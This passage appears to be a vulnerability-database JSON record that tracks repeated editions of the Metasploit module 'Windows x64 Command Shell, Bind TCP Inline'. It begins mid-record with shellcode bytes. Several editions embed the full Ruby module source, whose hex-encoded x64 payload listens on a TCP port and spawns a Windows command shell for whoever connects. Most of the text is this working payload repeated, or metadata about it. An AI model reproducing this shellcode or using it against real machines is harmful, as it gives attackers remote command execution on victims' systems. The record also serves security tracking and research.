\"\\x01\\xD0\\x41\\x8B\\x04\\x88\\x48\\x01\\xD0\\x41\\x58\\x41\\x58\\x5E\\x59\\x5A\" +\n \"\\x41\\x58\\x41\\x59\\x41\\x5A\\x48\\x83\\xEC\\x20\\x41\\x52\\xFF\\xE0\\x58\\x41\" +\n \"\\x59\\x5A\\x48\\x8B\\x12\\xE9\\x57\\xFF\\xFF\\xFF\\x5D\\x49\\xBE\\x77\\x73\\x32\" +\n \"\\x5F\\x33\\x32\\x00\\x00\\x41\\x56\\x49\\x89\\xE6\\x48\\x81\\xEC\\xA0\\x01\\x00\" +\n \"\\x00\\x49\\x89\\xE5\\x49\\xBC\\x02\\x00\\x11\\x5C\\x00\\x00\\x00\\x00\\x41\\x54\" +\n \"\\x49\\x89\\xE4\\x4C\\x89\\xF1\\x41\\xBA\\x4C\\x77\\x26\\x07\\xFF\\xD5\\x4C\\x89\" +\n \"\\xEA\\x68\\x01\\x01\\x00\\x00\\x59\\x41\\xBA\\x29\\x80\\x6B\\x00\\xFF\\xD5\\x50\" +\n \"\\x50\\x4D\\x31\\xC9\\x4D\\x31\\xC0\\x48\\xFF\\xC0\\x48\\x89\\xC2\\x48\\xFF\\xC0\" +\n \"\\x48\\x89\\xC1\\x41\\xBA\\xEA\\x0F\\xDF\\xE0\\xFF\\xD5\\x48\\x89\\xC7\\x6A\\x10\" +\n \"\\x41\\x58\\x4C\\x89\\xE2\\x48\\x89\\xF9\\x41\\xBA\\xC2\\xDB\\x37\\x67\\xFF\\xD5\" +\n \"\\x48\\x31\\xD2\\x48\\x89\\xF9\\x41\\xBA\\xB7\\xE9\\x38\\xFF\\xFF\\xD5\\x4D\\x31\" +\n \"\\xC0\\x48\\x31\\xD2\\x48\\x89\\xF9\\x41\\xBA\\x74\\xEC\\x3B\\xE1\\xFF\\xD5\\x48\" +\n \"\\x89\\xF9\\x48\\x89\\xC7\\x41\\xBA\\x75\\x6E\\x4D\\x61\\xFF\\xD5\\x48\\x81\\xC4\" +\n \"\\xA0\\x02\\x00\\x00\\x49\\xB8\\x63\\x6D\\x64\\x00\\x00\\x00\\x00\\x00\\x41\\x50\" +\n \"\\x41\\x50\\x48\\x89\\xE2\\x57\\x57\\x57\\x4D\\x31\\xC0\\x6A\\x0D\\x59\\x41\\x50\" +\n \"\\xE2\\xFC\\x66\\xC7\\x44\\x24\\x54\\x01\\x01\\x48\\x8D\\x44\\x24\\x18\\xC6\\x00\" +\n \"\\x68\\x48\\x89\\xE6\\x56\\x50\\x41\\x50\\x41\\x50\\x41\\x50\\x49\\xFF\\xC0\\x41\" +\n \"\\x50\\x49\\xFF\\xC8\\x4D\\x89\\xC1\\x4C\\x89\\xC1\\x41\\xBA\\x79\\xCC\\x3F\\x86\" +\n \"\\xFF\\xD5\\x48\\x31\\xD2\\x48\\xFF\\xCA\\x8B\\x0E\\x41\\xBA\\x08\\x87\\x1D\\x60\" +\n \"\\xFF\\xD5\\xBB\\xE0\\x1D\\x2A\\x0A\\x41\\xBA\\xA6\\x95\\xBD\\x9D\\xFF\\xD5\\x48\" +\n \"\\x83\\xC4\\x28\\x3C\\x06\\x7C\\x0A\\x80\\xFB\\xE0\\x75\\x05\\xBB\\x47\\x13\\x72\" +\n \"\\x6F\\x6A\\x00\\x59\\x41\\x89\\xDA\\xFF\\xD5\"\n }\n ))\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-08-02T23:13:04", "differentElements": ["sourceData"], "edition": 19}, {"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/X64/SHELL_BIND_TCP", "hash": "2180a5f35d972d1454f0b8cb0cf96edd", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows x64 Command Shell, Bind TCP Inline", "description": "Listen for a connection and spawn a command shell (Windows x64)\n", "published": "2009-08-27T19:29:54", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-08-20T07:19:31", "history": [], "viewCount": 19, "enchantments": {"score": {"value": 2.1, "vector": "NONE", "modified": "2019-08-20T07:19:31"}, "dependencies": {"references": [{"type": "mskb", "idList": ["KB4512482", "KB4512518", "KB4507462", "KB4503285", "KB4512491", "KB4507461", "KB4507452", "KB4507455", "KB4512497", "KB4511553"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:A2F4F189ED1DD4ADE13351F7C54C10C4"]}, {"type": "securelist", "idList": ["SECURELIST:4CA85687D57BCAE196E136B1708E2402", "SECURELIST:78FB952921DD97BAF55DA33811CB6FE4"]}, {"type": "exploitdb", "idList": ["EDB-ID:47294", "EDB-ID:47285"]}, {"type": "myhack58", "idList": ["MYHACK58:62201995540"]}], "modified": "2019-08-20T07:19:31"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/singles/windows/x64/shell_bind_tcp.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-08-20T07:19:31", "differentElements": ["sourceData"], "edition": 20}, {"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/X64/SHELL_BIND_TCP", "hash": "d3aa2f8684d6dd258707ef5b8753c445", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows x64 Command Shell, Bind TCP Inline", "description": "Listen for a connection and spawn a command shell (Windows x64)\n", "published": "2009-08-27T19:29:54", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-08-20T16:48:43", "history": [], "viewCount": 24, "enchantments": {"score": {"value": 5.8, "vector": "NONE", "modified": "2019-08-20T16:48:43"}, "dependencies": {"references": [{"type": "malwarebytes", "idList": ["MALWAREBYTES:EBEFBA9A29ACDC6FD30606EC8A9FFEB1"]}, {"type": "talos", "idList": ["TALOS-2019-0794", "TALOS-2019-0795", "TALOS-2019-0805", "TALOS-2019-0800", "TALOS-2019-0811"]}, {"type": "mskb", "idList": ["KB4512482", "KB4512518", "KB4507462", "KB4503285", "KB4512491", "KB4507461", "KB4507452", "KB4507455"]}, {"type": "cve", "idList": ["CVE-2019-11163", "CVE-2019-6165"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:A2F4F189ED1DD4ADE13351F7C54C10C4"]}, {"type": "securelist", "idList": ["SECURELIST:4CA85687D57BCAE196E136B1708E2402", "SECURELIST:78FB952921DD97BAF55DA33811CB6FE4"]}, {"type": "exploitdb", "idList": ["EDB-ID:47294"]}], "modified": "2019-08-20T16:48:43"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/singles/windows/x64/shell_bind_tcp.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/bind_tcp'\nrequire 'msf/base/sessions/command_shell'\nrequire 'msf/base/sessions/command_shell_options'\n\nmodule MetasploitModule\n\n CachedSize = 505\n\n include Msf::Payload::Windows\n include Msf::Payload::Single\n include Msf::Sessions::CommandShellOptions\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Windows x64 Command Shell, Bind TCP Inline',\n 'Description' => 'Listen for a connection and spawn a command shell (Windows x64)',\n 'Author' => [ 'sf' ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X64,\n 'Handler' => Msf::Handler::BindTcp,\n 'Session' => Msf::Sessions::CommandShell,\n 'Payload' =>\n {\n 'Offsets' =>\n {\n 'LPORT' => [ 232, 'n' ],\n 'EXITFUNC' => [ 467, 'V' ],\n },\n 'Payload' =>\n \"\\xFC\\x48\\x83\\xE4\\xF0\\xE8\\xC0\\x00\\x00\\x00\\x41\\x51\\x41\\x50\\x52\\x51\" +\n \"\\x56\\x48\\x31\\xD2\\x65\\x48\\x8B\\x52\\x60\\x48\\x8B\\x52\\x18\\x48\\x8B\\x52\" +\n \"\\x20\\x48\\x8B\\x72\\x50\\x48\\x0F\\xB7\\x4A\\x4A\\x4D\\x31\\xC9\\x48\\x31\\xC0\" +\n \"\\xAC\\x3C\\x61\\x7C\\x02\\x2C\\x20\\x41\\xC1\\xC9\\x0D\\x41\\x01\\xC1\\xE2\\xED\" +\n \"\\x52\\x41\\x51\\x48\\x8B\\x52\\x20\\x8B\\x42\\x3C\\x48\\x01\\xD0\\x8B\\x80\\x88\" +\n \"\\x00\\x00\\x00\\x48\\x85\\xC0\\x74\\x67\\x48\\x01\\xD0\\x50\\x8B\\x48\\x18\\x44\" +\n \"\\x8B\\x40\\x20\\x49\\x01\\xD0\\xE3\\x56\\x48\\xFF\\xC9\\x41\\x8B\\x34\\x88\\x48\" +\n \"\\x01\\xD6\\x4D\\x31\\xC9\\x48\\x31\\xC0\\xAC\\x41\\xC1\\xC9\\x0D\\x41\\x01\\xC1\" +\n \"\\x38\\xE0\\x75\\xF1\\x4C\\x03\\x4C\\x24\\x08\\x45\\x39\\xD1\\x75\\xD8\\x58\\x44\" +\n \"\\x8B\\x40\\x24\\x49\\x01\\xD0\\x66\\x41\\x8B\\x0C\\x48\\x44\\x8B\\x40\\x1C\\x49\" +\n \"\\x01\\xD0\\x41\\x8B\\x04\\x88\\x48\\x01\\xD0\\x41\\x58\\x41\\x58\\x5E\\x59\\x5A\" +\n \"\\x41\\x58\\x41\\x59\\x41\\x5A\\x48\\x83\\xEC\\x20\\x41\\x52\\xFF\\xE0\\x58\\x41\" +\n \"\\x59\\x5A\\x48\\x8B\\x12\\xE9\\x57\\xFF\\xFF\\xFF\\x5D\\x49\\xBE\\x77\\x73\\x32\" +\n \"\\x5F\\x33\\x32\\x00\\x00\\x41\\x56\\x49\\x89\\xE6\\x48\\x81\\xEC\\xA0\\x01\\x00\" +\n \"\\x00\\x49\\x89\\xE5\\x49\\xBC\\x02\\x00\\x11\\x5C\\x00\\x00\\x00\\x00\\x41\\x54\" +\n \"\\x49\\x89\\xE4\\x4C\\x89\\xF1\\x41\\xBA\\x4C\\x77\\x26\\x07\\xFF\\xD5\\x4C\\x89\" +\n \"\\xEA\\x68\\x01\\x01\\x00\\x00\\x59\\x41\\xBA\\x29\\x80\\x6B\\x00\\xFF\\xD5\\x50\" +\n \"\\x50\\x4D\\x31\\xC9\\x4D\\x31\\xC0\\x48\\xFF\\xC0\\x48\\x89\\xC2\\x48\\xFF\\xC0\" +\n \"\\x48\\x89\\xC1\\x41\\xBA\\xEA\\x0F\\xDF\\xE0\\xFF\\xD5\\x48\\x89\\xC7\\x6A\\x10\" +\n \"\\x41\\x58\\x4C\\x89\\xE2\\x48\\x89\\xF9\\x41\\xBA\\xC2\\xDB\\x37\\x67\\xFF\\xD5\" +\n \"\\x48\\x31\\xD2\\x48\\x89\\xF9\\x41\\xBA\\xB7\\xE9\\x38\\xFF\\xFF\\xD5\\x4D\\x31\" +\n \"\\xC0\\x48\\x31\\xD2\\x48\\x89\\xF9\\x41\\xBA\\x74\\xEC\\x3B\\xE1\\xFF\\xD5\\x48\" +\n \"\\x89\\xF9\\x48\\x89\\xC7\\x41\\xBA\\x75\\x6E\\x4D\\x61\\xFF\\xD5\\x48\\x81\\xC4\" +\n \"\\xA0\\x02\\x00\\x00\\x49\\xB8\\x63\\x6D\\x64\\x00\\x00\\x00\\x00\\x00\\x41\\x50\" +\n \"\\x41\\x50\\x48\\x89\\xE2\\x57\\x57\\x57\\x4D\\x31\\xC0\\x6A\\x0D\\x59\\x41\\x50\" +\n \"\\xE2\\xFC\\x66\\xC7\\x44\\x24\\x54\\x01\\x01\\x48\\x8D\\x44\\x24\\x18\\xC6\\x00\" +\n \"\\x68\\x48\\x89\\xE6\\x56\\x50\\x41\\x50\\x41\\x50\\x41\\x50\\x49\\xFF\\xC0\\x41\" +\n \"\\x50\\x49\\xFF\\xC8\\x4D\\x89\\xC1\\x4C\\x89\\xC1\\x41\\xBA\\x79\\xCC\\x3F\\x86\" +\n \"\\xFF\\xD5\\x48\\x31\\xD2\\x48\\xFF\\xCA\\x8B\\x0E\\x41\\xBA\\x08\\x87\\x1D\\x60\" +\n \"\\xFF\\xD5\\xBB\\xE0\\x1D\\x2A\\x0A\\x41\\xBA\\xA6\\x95\\xBD\\x9D\\xFF\\xD5\\x48\" +\n \"\\x83\\xC4\\x28\\x3C\\x06\\x7C\\x0A\\x80\\xFB\\xE0\\x75\\x05\\xBB\\x47\\x13\\x72\" +\n \"\\x6F\\x6A\\x00\\x59\\x41\\x89\\xDA\\xFF\\xD5\"\n }\n ))\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-08-20T16:48:43", "differentElements": ["sourceData"], "edition": 21}, {"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/X64/SHELL_BIND_TCP", "hash": "2180a5f35d972d1454f0b8cb0cf96edd", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows x64 Command Shell, Bind TCP Inline", "description": "Listen for a connection and spawn a command shell (Windows x64)\n", "published": "2009-08-27T19:29:54", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-10-01T14:38:55", "history": [], "viewCount": 24, "enchantments": {"score": {"value": 2.4, "vector": "NONE", "modified": "2019-10-01T14:38:55"}, "dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:47444", "EDB-ID:47441", "EDB-ID:47440", "EDB-ID:47439"]}, {"type": "hackread", "idList": ["HACKREAD:072658B9AEECE5CB6CB1ECBD5869BC97"]}, {"type": "mssecure", "idList": ["MSSECURE:273B8840FBE34F82F327AD16742071E1"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:9CDBEDA15FF4CED25080F01340199D74"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:5E10C725B6B846C3D9C332A6C5B43A8A"]}, {"type": "thn", "idList": ["THN:A947D0153E6D676ABBCCAB69CD1E73DB"]}, {"type": "talosblog", "idList": ["TALOSBLOG:4337E0F193BD1CA31D01BEC842EF2E1A", "TALOSBLOG:A57C368F8D0771E4008166A7A70CC2AC"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310112643"]}, {"type": "kitploit", "idList": ["KITPLOIT:7622023651954090052", "KITPLOIT:715211167943671213", "KITPLOIT:730987502722793008"]}, {"type": "freebsd", "idList": ["E917CABA-E291-11E9-89F1-152FED202BB7"]}, {"type": "cve", "idList": ["CVE-2019-11751", "CVE-2019-11736", "CVE-2019-11753"]}, {"type": "threatpost", "idList": ["THREATPOST:FF3E262419A71E9CFD99DBD361F702C3"]}], "modified": "2019-10-01T14:38:55"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/singles/windows/x64/shell_bind_tcp.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-10-01T14:38:55", "differentElements": ["sourceData"], "edition": 22}, {"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/X64/SHELL_BIND_TCP", "hash": "d3aa2f8684d6dd258707ef5b8753c445", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows x64 Command Shell, Bind TCP Inline", "description": "Listen for a connection and spawn a command shell (Windows x64)\n", "published": "2009-08-27T19:29:54", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-10-01T16:08:39", "history": [], "viewCount": 24, "enchantments": {"score": {"value": 2.7, "vector": "NONE", "modified": "2019-10-01T16:08:39"}, "dependencies": {"references": [{"type": "thn", "idList": ["THN:1EBBC3A78AD76193EC9C78495D0E85A8", "THN:A947D0153E6D676ABBCCAB69CD1E73DB"]}, {"type": "mssecure", "idList": ["MSSECURE:7BB2A91E1EFA2052B895EF9B11014D83", "MSSECURE:273B8840FBE34F82F327AD16742071E1"]}, {"type": "exploitdb", "idList": ["EDB-ID:47444", "EDB-ID:47441", "EDB-ID:47440", "EDB-ID:47439"]}, {"type": "hackread", "idList": ["HACKREAD:072658B9AEECE5CB6CB1ECBD5869BC97"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:9CDBEDA15FF4CED25080F01340199D74"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:5E10C725B6B846C3D9C332A6C5B43A8A"]}, {"type": "talosblog", "idList": ["TALOSBLOG:4337E0F193BD1CA31D01BEC842EF2E1A", "TALOSBLOG:A57C368F8D0771E4008166A7A70CC2AC"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310112643"]}, {"type": "kitploit", "idList": ["KITPLOIT:7622023651954090052", "KITPLOIT:715211167943671213", "KITPLOIT:730987502722793008"]}, {"type": "freebsd", "idList": ["E917CABA-E291-11E9-89F1-152FED202BB7"]}, {"type": "cve", "idList": ["CVE-2019-11736", "CVE-2019-11751"]}], "modified": "2019-10-01T16:08:39"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/singles/windows/x64/shell_bind_tcp.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/bind_tcp'\nrequire 'msf/base/sessions/command_shell'\nrequire 'msf/base/sessions/command_shell_options'\n\nmodule MetasploitModule\n\n CachedSize = 505\n\n include Msf::Payload::Windows\n include Msf::Payload::Single\n include Msf::Sessions::CommandShellOptions\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Windows x64 Command Shell, Bind TCP Inline',\n 'Description' => 'Listen for a connection and spawn a command shell (Windows x64)',\n 'Author' => [ 'sf' ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X64,\n 'Handler' => Msf::Handler::BindTcp,\n 'Session' => Msf::Sessions::CommandShell,\n 'Payload' =>\n {\n 'Offsets' =>\n {\n 'LPORT' => [ 232, 'n' ],\n 'EXITFUNC' => [ 467, 'V' ],\n },\n 'Payload' =>\n \"\\xFC\\x48\\x83\\xE4\\xF0\\xE8\\xC0\\x00\\x00\\x00\\x41\\x51\\x41\\x50\\x52\\x51\" +\n \"\\x56\\x48\\x31\\xD2\\x65\\x48\\x8B\\x52\\x60\\x48\\x8B\\x52\\x18\\x48\\x8B\\x52\" +\n \"\\x20\\x48\\x8B\\x72\\x50\\x48\\x0F\\xB7\\x4A\\x4A\\x4D\\x31\\xC9\\x48\\x31\\xC0\" +\n \"\\xAC\\x3C\\x61\\x7C\\x02\\x2C\\x20\\x41\\xC1\\xC9\\x0D\\x41\\x01\\xC1\\xE2\\xED\" +\n \"\\x52\\x41\\x51\\x48\\x8B\\x52\\x20\\x8B\\x42\\x3C\\x48\\x01\\xD0\\x8B\\x80\\x88\" +\n \"\\x00\\x00\\x00\\x48\\x85\\xC0\\x74\\x67\\x48\\x01\\xD0\\x50\\x8B\\x48\\x18\\x44\" +\n \"\\x8B\\x40\\x20\\x49\\x01\\xD0\\xE3\\x56\\x48\\xFF\\xC9\\x41\\x8B\\x34\\x88\\x48\" +\n \"\\x01\\xD6\\x4D\\x31\\xC9\\x48\\x31\\xC0\\xAC\\x41\\xC1\\xC9\\x0D\\x41\\x01\\xC1\" +\n \"\\x38\\xE0\\x75\\xF1\\x4C\\x03\\x4C\\x24\\x08\\x45\\x39\\xD1\\x75\\xD8\\x58\\x44\" +\n \"\\x8B\\x40\\x24\\x49\\x01\\xD0\\x66\\x41\\x8B\\x0C\\x48\\x44\\x8B\\x40\\x1C\\x49\" +\n \"\\x01\\xD0\\x41\\x8B\\x04\\x88\\x48\\x01\\xD0\\x41\\x58\\x41\\x58\\x5E\\x59\\x5A\" +\n \"\\x41\\x58\\x41\\x59\\x41\\x5A\\x48\\x83\\xEC\\x20\\x41\\x52\\xFF\\xE0\\x58\\x41\" +\n \"\\x59\\x5A\\x48\\x8B\\x12\\xE9\\x57\\xFF\\xFF\\xFF\\x5D\\x49\\xBE\\x77\\x73\\x32\" +\n \"\\x5F\\x33\\x32\\x00\\x00\\x41\\x56\\x49\\x89\\xE6\\x48\\x81\\xEC\\xA0\\x01\\x00\" +\n \"\\x00\\x49\\x89\\xE5\\x49\\xBC\\x02\\x00\\x11\\x5C\\x00\\x00\\x00\\x00\\x41\\x54\" +\n \"\\x49\\x89\\xE4\\x4C\\x89\\xF1\\x41\\xBA\\x4C\\x77\\x26\\x07\\xFF\\xD5\\x4C\\x89\" +\n \"\\xEA\\x68\\x01\\x01\\x00\\x00\\x59\\x41\\xBA\\x29\\x80\\x6B\\x00\\xFF\\xD5\\x50\" +\n \"\\x50\\x4D\\x31\\xC9\\x4D\\x31\\xC0\\x48\\xFF\\xC0\\x48\\x89\\xC2\\x48\\xFF\\xC0\" +\n \"\\x48\\x89\\xC1\\x41\\xBA\\xEA\\x0F\\xDF\\xE0\\xFF\\xD5\\x48\\x89\\xC7\\x6A\\x10\" +\n \"\\x41\\x58\\x4C\\x89\\xE2\\x48\\x89\\xF9\\x41\\xBA\\xC2\\xDB\\x37\\x67\\xFF\\xD5\" +\n \"\\x48\\x31\\xD2\\x48\\x89\\xF9\\x41\\xBA\\xB7\\xE9\\x38\\xFF\\xFF\\xD5\\x4D\\x31\" +\n \"\\xC0\\x48\\x31\\xD2\\x48\\x89\\xF9\\x41\\xBA\\x74\\xEC\\x3B\\xE1\\xFF\\xD5\\x48\" +\n \"\\x89\\xF9\\x48\\x89\\xC7\\x41\\xBA\\x75\\x6E\\x4D\\x61\\xFF\\xD5\\x48\\x81\\xC4\" +\n \"\\xA0\\x02\\x00\\x00\\x49\\xB8\\x63\\x6D\\x64\\x00\\x00\\x00\\x00\\x00\\x41\\x50\" +\n \"\\x41\\x50\\x48\\x89\\xE2\\x57\\x57\\x57\\x4D\\x31\\xC0\\x6A\\x0D\\x59\\x41\\x50\" +\n \"\\xE2\\xFC\\x66\\xC7\\x44\\x24\\x54\\x01\\x01\\x48\\x8D\\x44\\x24\\x18\\xC6\\x00\" +\n \"\\x68\\x48\\x89\\xE6\\x56\\x50\\x41\\x50\\x41\\x50\\x41\\x50\\x49\\xFF\\xC0\\x41\" +\n \"\\x50\\x49\\xFF\\xC8\\x4D\\x89\\xC1\\x4C\\x89\\xC1\\x41\\xBA\\x79\\xCC\\x3F\\x86\" +\n \"\\xFF\\xD5\\x48\\x31\\xD2\\x48\\xFF\\xCA\\x8B\\x0E\\x41\\xBA\\x08\\x87\\x1D\\x60\" +\n \"\\xFF\\xD5\\xBB\\xE0\\x1D\\x2A\\x0A\\x41\\xBA\\xA6\\x95\\xBD\\x9D\\xFF\\xD5\\x48\" +\n \"\\x83\\xC4\\x28\\x3C\\x06\\x7C\\x0A\\x80\\xFB\\xE0\\x75\\x05\\xBB\\x47\\x13\\x72\" +\n \"\\x6F\\x6A\\x00\\x59\\x41\\x89\\xDA\\xFF\\xD5\"\n }\n ))\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-10-01T16:08:39", "differentElements": ["sourceData"], "edition": 23}, {"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/X64/SHELL_BIND_TCP", "hash": "2180a5f35d972d1454f0b8cb0cf96edd", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows x64 Command Shell, Bind TCP Inline", "description": "Listen for a connection and spawn a command shell (Windows x64)\n", "published": "2009-08-27T19:29:54", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-10-06T12:10:14", "history": [], "viewCount": 24, "enchantments": {"score": {"value": 2.1, "vector": "NONE", "modified": "2019-10-06T12:10:14"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2019-17199", "CVE-2019-17180", "CVE-2019-15162"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154738", "PACKETSTORM:154735", "PACKETSTORM:154736", "PACKETSTORM:154737"]}, {"type": "hackread", "idList": ["HACKREAD:5A404B45E6DC5DB911C89C0F6D2D235D"]}, {"type": "talosblog", "idList": ["TALOSBLOG:5757EE09BE22E4808719C348402D3F43"]}, {"type": "mskb", "idList": ["KB4516065", "KB4516033"]}, {"type": "kitploit", "idList": ["KITPLOIT:1929283733434729640"]}, {"type": "mssecure", "idList": ["MSSECURE:8DF3393BE9822660F1B18B7D7DCD3AC4"]}, {"type": "msupdate", "idList": ["MS:EF31383A-7932-441A-A626-F0A145CC422A", "MS:375F016C-B4AC-4D71-9DEE-8095427A3C86", "MS:18552C40-7E36-4F15-960A-9717A4912AF1", "MS:FBA96F27-5955-45E1-82E5-AD350B4627E0", "MS:72890150-DA44-47B2-B1B5-7DCE2D5D1A30", "MS:2CA3D95F-1ECB-4850-AEB4-AFB63CD6374A", "MS:9668152F-78A1-44F9-A229-38E86189703A"]}], "modified": "2019-10-06T12:10:14"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/singles/windows/x64/shell_bind_tcp.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-10-06T12:10:14", "differentElements": ["sourceData"], "edition": 24}, {"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/X64/SHELL_BIND_TCP", "hash": "d3aa2f8684d6dd258707ef5b8753c445", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows x64 Command Shell, Bind TCP Inline", "description": "Listen for a connection and spawn a command shell (Windows x64)\n", "published": "2009-08-27T19:29:54", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-10-06T15:50:16", "history": [], "viewCount": 25, "enchantments": {"score": {"value": 2.6, "vector": "NONE", "modified": "2019-10-06T15:50:16"}, "dependencies": {"references": [{"type": "jakearchibald", "idList": ["JAKEARCHIBALD:AE099BFD5E48A6EC3AAB5E2D141B3F6D"]}, {"type": "kitploit", "idList": ["KITPLOIT:7944621450687180670", "KITPLOIT:1929283733434729640"]}, {"type": "cve", "idList": ["CVE-2019-17199", "CVE-2019-17180", "CVE-2019-15162"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154735", "PACKETSTORM:154738", "PACKETSTORM:154736", "PACKETSTORM:154737"]}, {"type": "hackread", "idList": ["HACKREAD:5A404B45E6DC5DB911C89C0F6D2D235D"]}, {"type": "talosblog", "idList": ["TALOSBLOG:5757EE09BE22E4808719C348402D3F43"]}, {"type": "mskb", "idList": ["KB4516065", "KB4516033"]}, {"type": "mssecure", "idList": ["MSSECURE:8DF3393BE9822660F1B18B7D7DCD3AC4"]}, {"type": "msupdate", "idList": ["MS:375F016C-B4AC-4D71-9DEE-8095427A3C86", "MS:EF31383A-7932-441A-A626-F0A145CC422A", "MS:18552C40-7E36-4F15-960A-9717A4912AF1", "MS:FBA96F27-5955-45E1-82E5-AD350B4627E0", "MS:72890150-DA44-47B2-B1B5-7DCE2D5D1A30"]}], "modified": "2019-10-06T15:50:16"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/singles/windows/x64/shell_bind_tcp.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/bind_tcp'\nrequire 'msf/base/sessions/command_shell'\nrequire 'msf/base/sessions/command_shell_options'\n\nmodule MetasploitModule\n\n CachedSize = 505\n\n include Msf::Payload::Windows\n include Msf::Payload::Single\n include Msf::Sessions::CommandShellOptions\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Windows x64 Command Shell, Bind TCP Inline',\n 'Description' => 'Listen for a connection and spawn a command shell (Windows x64)',\n 'Author' => [ 'sf' ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X64,\n 'Handler' => Msf::Handler::BindTcp,\n 'Session' => Msf::Sessions::CommandShell,\n 'Payload' =>\n {\n 'Offsets' =>\n {\n 'LPORT' => [ 232, 'n' ],\n 'EXITFUNC' => [ 467, 'V' ],\n },\n 'Payload' =>\n \"\\xFC\\x48\\x83\\xE4\\xF0\\xE8\\xC0\\x00\\x00\\x00\\x41\\x51\\x41\\x50\\x52\\x51\" +\n \"\\x56\\x48\\x31\\xD2\\x65\\x48\\x8B\\x52\\x60\\x48\\x8B\\x52\\x18\\x48\\x8B\\x52\" +\n \"\\x20\\x48\\x8B\\x72\\x50\\x48\\x0F\\xB7\\x4A\\x4A\\x4D\\x31\\xC9\\x48\\x31\\xC0\" +\n \"\\xAC\\x3C\\x61\\x7C\\x02\\x2C\\x20\\x41\\xC1\\xC9\\x0D\\x41\\x01\\xC1\\xE2\\xED\" +\n \"\\x52\\x41\\x51\\x48\\x8B\\x52\\x20\\x8B\\x42\\x3C\\x48\\x01\\xD0\\x8B\\x80\\x88\" +\n \"\\x00\\x00\\x00\\x48\\x85\\xC0\\x74\\x67\\x48\\x01\\xD0\\x50\\x8B\\x48\\x18\\x44\" +\n \"\\x8B\\x40\\x20\\x49\\x01\\xD0\\xE3\\x56\\x48\\xFF\\xC9\\x41\\x8B\\x34\\x88\\x48\" +\n \"\\x01\\xD6\\x4D\\x31\\xC9\\x48\\x31\\xC0\\xAC\\x41\\xC1\\xC9\\x0D\\x41\\x01\\xC1\" +\n \"\\x38\\xE0\\x75\\xF1\\x4C\\x03\\x4C\\x24\\x08\\x45\\x39\\xD1\\x75\\xD8\\x58\\x44\" +\n 